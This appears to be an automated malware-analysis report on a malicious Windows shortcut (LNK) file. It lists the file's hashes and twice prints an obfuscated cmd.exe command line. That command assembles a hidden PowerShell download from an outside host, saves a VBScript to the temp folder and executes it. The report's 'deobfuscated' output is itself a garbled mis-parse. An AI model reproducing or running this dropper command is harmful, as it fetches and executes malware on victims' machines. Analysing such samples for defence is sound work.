Malicious
Malicious
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
675d9b8bc81f9f22656fee729038560e
Sha1
1e248744243612781bff596923253eec7eb4446b
Sha256
c3ff9855cb9697f49eae943960bdf82ecac6ab1b9256e0fb63d6acf662cf2302
Sha384
0e55bf3a984c2c8d26d22cb1e9e3410c9aa85874f87be0957624e7f91de19e22faa2e31ac91c32adafd2a762c78ac050
Sha512
9847691a60f49541ab083ece9eca61c232a718cf4676f401b9651a696cecab228a2bb93768f7ec3241c9989a7254751edf2013793b276be8a2d89c79f18c6951
SSDeep
96:8YH9omrvxz+IIUa/5468GumkShpJsOCOvuJ:8YH9hZlcfjv
TLSH
D291BD101BF94218F2B38F39A5FDA32292717AD17D32952D4561CF4C7C24684A87AF77
File Structure
675d9b8bc81f9f22656fee729038560e
Malicious
LNK CommandLine
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[Lnk Summary]
Malicious
Artefacts
Name
 Value
LNK: Command Execution

cmd.exe /0DR5:2rz9 /DS6LR:1DJ76 /D/C "for /f "tokens=3" %A in ("z9 lvhum powershell 7m aqb") do for /f "tokens=2" %B in ("ij hidden vsm tegy4") do for /f "tokens=2" %C in ("4k0 IWR uwhg8 gou") do for /f "tokens=2" %D in ("qo Uri uk2h 91y 4x") do for /f "tokens=3" %E in ("84b h0pb OutFile kjx9r bp7zx") do for /f "tokens=4" %F in ("40og z9on5 7ebz https:// 58oa") do for /f "tokens=3" %G in ("lonz uf cyeza lvae") do for /f "tokens=4" %H in ("aml zyku 88 . 8ot o2e jb") do for /f "tokens=3" %I in ("adcug 2obhn botecoalto cqgd fm51 wv") do for /f "tokens=3" %J in ("kmj b6v56 . me2") do for /f "tokens=3" %K in ("ag jqzf sbs i4") do for /f "tokens=2" %L in ("xeize / je1") do for /f "tokens=3" %M in ("glktg jj8 wdnsr fr2 fq jhm") do for /f "tokens=3" %N in ("7d3j fgynu / 4el") do for /f "tokens=2" %O in ("nc1 809550 xmasz") do for /f "tokens=2" %P in ("zu2 / y5os8 a1 j4f8") do %A -w %B "%C -%D %F%G%H%I%J%K%L%M%N%O%P -%E $env:tmp\fk8a03.vbs" && %tmp%\fk8a03.vbs"
Deobfuscated PowerShell

7m "aqb) do for /f tokens=2 %B in (ij" "hidden" "vsm" "tegy4) do for /f tokens=2 %C in (4k0" "IWR" "uwhg8" "gou) do for /f tokens=2 %D in (qo" "Uri" "uk2h" 91 "4x) do for /f tokens=3 %E in (84b" "h0pb" "OutFile" "kjx9r" "bp7zx) do for /f tokens=4 %F in (40og" "z9on5" "7ebz" "https://" "58oa) do for /f tokens=3 %G in (lonz" "uf" "cyeza" "lvae) do for /f tokens=4 %H in (aml" "zyku" 88 "." "8ot" "o2e" "jb) do for /f tokens=3 %I in (adcug" "2obhn" "botecoalto" "cqgd" "fm51" "wv) do for /f tokens=3 %J in (kmj" "b6v56" "." "me2) do for /f tokens=3 %K in (ag" "jqzf" "sbs" "i4) do for /f tokens=2 %L in (xeize" "/" "je1) do for /f tokens=3 %M in (glktg" "jj8" "wdnsr" "fr2" "fq" "jhm) do for /f tokens=3 %N in (7d3j" "fgynu" "/" "4el) do for /f tokens=2 %O in (nc1" 809550 "xmasz) do for /f tokens=2 %P in (zu2" "/" "y5os8" "a1" "j4f8) do %A -w %B %C" "-%D" "%F%G%H%I%J%K%L%M%N%O%P" "-%E" $env:tmp\fk8a03.vbs && %tmp%\fk8a03.vbs
675d9b8bc81f9f22656fee729038560e (4.51 KB)
File Structure
675d9b8bc81f9f22656fee729038560e
Malicious
LNK CommandLine
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[Lnk Summary]
Malicious
Characteristics
No malware configuration were found at this point.
Artefacts
Name
 Value Location
LNK: Command Execution

cmd.exe /0DR5:2rz9 /DS6LR:1DJ76 /D/C "for /f "tokens=3" %A in ("z9 lvhum powershell 7m aqb") do for /f "tokens=2" %B in ("ij hidden vsm tegy4") do for /f "tokens=2" %C in ("4k0 IWR uwhg8 gou") do for /f "tokens=2" %D in ("qo Uri uk2h 91y 4x") do for /f "tokens=3" %E in ("84b h0pb OutFile kjx9r bp7zx") do for /f "tokens=4" %F in ("40og z9on5 7ebz https:// 58oa") do for /f "tokens=3" %G in ("lonz uf cyeza lvae") do for /f "tokens=4" %H in ("aml zyku 88 . 8ot o2e jb") do for /f "tokens=3" %I in ("adcug 2obhn botecoalto cqgd fm51 wv") do for /f "tokens=3" %J in ("kmj b6v56 . me2") do for /f "tokens=3" %K in ("ag jqzf sbs i4") do for /f "tokens=2" %L in ("xeize / je1") do for /f "tokens=3" %M in ("glktg jj8 wdnsr fr2 fq jhm") do for /f "tokens=3" %N in ("7d3j fgynu / 4el") do for /f "tokens=2" %O in ("nc1 809550 xmasz") do for /f "tokens=2" %P in ("zu2 / y5os8 a1 j4f8") do %A -w %B "%C -%D %F%G%H%I%J%K%L%M%N%O%P -%E $env:tmp\fk8a03.vbs" && %tmp%\fk8a03.vbs"

Malicious

675d9b8bc81f9f22656fee729038560e
Deobfuscated PowerShell

7m "aqb) do for /f tokens=2 %B in (ij" "hidden" "vsm" "tegy4) do for /f tokens=2 %C in (4k0" "IWR" "uwhg8" "gou) do for /f tokens=2 %D in (qo" "Uri" "uk2h" 91 "4x) do for /f tokens=3 %E in (84b" "h0pb" "OutFile" "kjx9r" "bp7zx) do for /f tokens=4 %F in (40og" "z9on5" "7ebz" "https://" "58oa) do for /f tokens=3 %G in (lonz" "uf" "cyeza" "lvae) do for /f tokens=4 %H in (aml" "zyku" 88 "." "8ot" "o2e" "jb) do for /f tokens=3 %I in (adcug" "2obhn" "botecoalto" "cqgd" "fm51" "wv) do for /f tokens=3 %J in (kmj" "b6v56" "." "me2) do for /f tokens=3 %K in (ag" "jqzf" "sbs" "i4) do for /f tokens=2 %L in (xeize" "/" "je1) do for /f tokens=3 %M in (glktg" "jj8" "wdnsr" "fr2" "fq" "jhm) do for /f tokens=3 %N in (7d3j" "fgynu" "/" "4el) do for /f tokens=2 %O in (nc1" 809550 "xmasz) do for /f tokens=2 %P in (zu2" "/" "y5os8" "a1" "j4f8) do %A -w %B %C" "-%D" "%F%G%H%I%J%K%L%M%N%O%P" "-%E" $env:tmp\fk8a03.vbs && %tmp%\fk8a03.vbs

Malicious

675d9b8bc81f9f22656fee729038560e > LNK CommandLine > [PowerShell Command]
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙